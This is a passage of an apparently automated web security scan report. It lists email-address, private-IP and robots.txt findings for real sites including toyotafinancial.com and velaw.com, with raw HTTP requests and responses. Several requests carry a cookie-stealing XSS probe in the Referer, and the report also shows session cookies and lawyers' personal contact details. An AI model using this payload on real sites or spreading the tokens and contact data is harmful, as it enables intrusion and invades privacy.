Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:15 GMT
Content-length: 54050
Last-Modified: Tue, 17 Jun 2008 08:34:26 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

// Title: Tigra Calendar PRO
// Description: Tigra Calendar PRO is flexible JavaScript Calendar offering
//     high reliability and wide browsers support.
// URL: http://www.softcomplex.com/products/tigra_calendar_pro/
// Version: 4.2
// Date: 05-24-2002 (mm-dd-yyyy)
// Technical Support: support@softcomplex.com (specify product title and order ID)
// Notes: This Script is shareware. Please visit url above for registration details.

// MODIFICATIONS
// Date modified: 06-13-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Moved some object references into a separate calendar method "cal_finish".
// Form field can now be placed after the constructor method but before the
// cal_finish() method. Removed
...[SNIP]...

// Added routine to cal_validate() to disable dates on the 29, 30, and 31st if
// reoccur_payment flag is set to true in the HTML file.
//
// Date modified: 06-25-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Changed cal_get_html() to not show past years in drop-down.
// Changed cal_get_body() to set today's date to class="calDayToday".
// Changed cal_finish() to update the current date to be within the
// date range if minimum or maximum date is specified.
//
// Date modified: 06-28-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Changed calendar() to create a this.min_valid_date property which
// is used to update the date when date is not valid.
//
// Date modified: 07-05-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Added a payment date parameter to constructor - sets selected date to
// payment date if specified. Also updated cal_finish() to set date form field
// to current date on initiali
...[SNIP]...

17.25. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/framework/skins/tfs/js/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /consumer/framework/skins/tfs/js/prototype.js HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:17 GMT
Content-length: 55149
Last-Modified: Tue, 30 Jan 2007 10:35:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

17.26. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 22 Jan 2011 01:23:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 71520
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<script type="text/javascript" src="http://i.usatoday.net/_common/_scripts/_
...[SNIP]...
<a href="mailto:accuracy@usatoday.com?subject=China goes big with building of skyscrapers&body=http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm">
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...

17.27. http://www.velaw.com/WorkArea/java/ektron.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Content-Length: 172238
Content-Type: application/x-javascript
Last-Modified: Wed, 25 Nov 2009 13:17:30 GMT
Accept-Ranges: bytes
ETag: "0d1f7a3d16dca1:30a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 18:25:00 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

17.28. http://www.velaw.com/lawyers/DavidBlumental.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /lawyers/DavidBlumental.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lawyers/DavidBlumental.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Mergers%2c+Acquisitions+and+Dispositions');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Oil+and+Gas');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Power');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Private+Equity%2fFinance');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Corporate%2fCommercial');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Professional Recognition');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Publications and Presentations');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=dblumental@velaw.com&atty_name=David M. Blumental&atty_lname=Blumental&atty_fname=David&atty_mname=M.&atty_level=2&atty_phone=+86.21.6196.8091&atty_cell=&atty_fax=+86.21.6196.8099&atty_phone2=+86.10.6410.6393&atty_fax2=+8
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= dblumental@velaw.com&atty_name=David M. Blumental')">dblumental@velaw.com</a>
...[SNIP]...

17.29. http://www.velaw.com/lawyers/DavidDAlessandro.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /lawyers/DavidDAlessandro.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lawyers/DavidDAlessandro.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+C.+D%2527Alessandro&t=Partner&p=+1.214.220.7890&c=&f=+1.214.999.7890&e=ddalessandro@velaw.com&addr=Trammell+Crow+Center%26lt%3bbr+%2f%26gt%3b2001+Ross+Avenue%26lt%3bbr+%2f%26gt%3bSuite+3700%26lt%3bbr+%2f%26gt%3bDallas%2c+TX+75201-2975&bioID=1630&SubHeadName=Professional Recognition');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=ddalessandro@velaw.com&atty_name=David C. D'Alessandro&atty_lname=D'Alessandro&atty_fname=David&atty_mname=C.&atty_level=2&atty_phone=+1.214.220.7890&atty_cell=&atty_fax=+1.214.999.7890&atty_phone2=&atty_fax2=&officeid=226&
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= ddalessandro@velaw.com&atty_name=David C. D%27Alessandro')">ddalessandro@velaw.com</a>
...[SNIP]...

17.30. http://www.velaw.com/lawyers/JaneVris.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /lawyers/JaneVris.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lawyers/JaneVris.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&subHeadName=Representative+Experience');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&SubHeadName=Professional Recognition');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=Jane+Lee+Vris&t=Partner&p=+1.212.237.0087&c=&f=+1.917.849.5387&e=jvris@velaw.com&addr=666+Fifth+Avenue%26lt%3bbr+%2f%26gt%3b26th+Floor%26lt%3bbr+%2f%26gt%3bNew+York%2c+NY+10103-0040&bioID=3156&SubHeadName=Publications and Presentations');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=jvris@velaw.com&atty_name=Jane Lee Vris&atty_lname=Vris&atty_fname=Jane&atty_mname=Lee&atty_level=2&atty_phone=+1.212.237.0087&atty_cell=&atty_fax=+1.917.849.5387&atty_phone2=&atty_fax2=&officeid=284&alterofficeid=">
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= jvris@velaw.com&atty_name=Jane Lee Vris')">jvris@velaw.com</a>
...[SNIP]...

17.31. http://www.velaw.com/offices/Dallas.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /offices/Dallas.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /offices/Dallas.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script id="EktronJ
...[SNIP]...
<td>mwortley@velaw.com</td>
...[SNIP]...

17.32. http://www.velaw.com/offices/Houston.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /offices/Houston.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /offices/Houston.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script id="EktronJ
...[SNIP]...
<td>myeates@velaw.com</td>
...[SNIP]...

18. Private IP addresses disclosed
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


18.1. http://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=jc98N5JMXvLLjLZFlFRQcc3KJbJlSv4lvpbgGG4LTpMJ6ZqH1DQL!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
}

//var baseUrl= schemeAjax + '://www.toyotafinancial.com:80/consumer/';
var baseUrl= schemeAjax + '://www.toyotafinancial.com/consumer/';


function callAjax(){
//var url = 'http://10.60.169.252:7090/consumer/jsp/tfs/ofsc/sendMenuResponse.jsp';
var url = baseUrl+'jsp/tfs/ofsc/sendMenuResponse.jsp';
//alert('URL= '+url);

       var myAjax = new Ajax.Request(
       url,
       {
           method: '
...[SNIP]...

18.2. https://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:43 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
}

//var baseUrl= schemeAjax + '://www.toyotafinancial.com:80/consumer/';
var baseUrl= schemeAjax + '://www.toyotafinancial.com/consumer/';


function callAjax(){
//var url = 'http://10.60.169.252:7090/consumer/jsp/tfs/ofsc/sendMenuResponse.jsp';
var url = baseUrl+'jsp/tfs/ofsc/sendMenuResponse.jsp';
//alert('URL= '+url);

       var myAjax = new Ajax.Request(
       url,
       {
           method: '
...[SNIP]...

19. Robots.txt file
There are 107 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


19.1. http://www.bilingualcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bilingualcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:08 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:23:24 GMT
ETag: "22f0ab3-1b0c-4948c34805300"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6924
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.2. http://www.biotechcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biotechcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:46:36 GMT
ETag: "2530328-1b0e-4855eadca9f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6926
Connection: close
Via: 1.1 AN-0016020122545304

           User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.3. http://www.bluecollarcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluecollarcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:15:18 GMT
ETag: "1b781da-1b0d-4948c17888d80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6925
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.4. http://www.businessanalystcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessanalystcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:46:18 GMT
ETag: "250830c-1a83-483c7506e9e80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.5. http://www.businessdevelopmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessdevelopmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:46:51 GMT
ETag: "2670170-1b0a-4855eaeaf80c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.6. http://www.callcentercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.callcentercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:47:16 GMT
ETag: "24e02d0-1b0a-4855eb02cf900"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
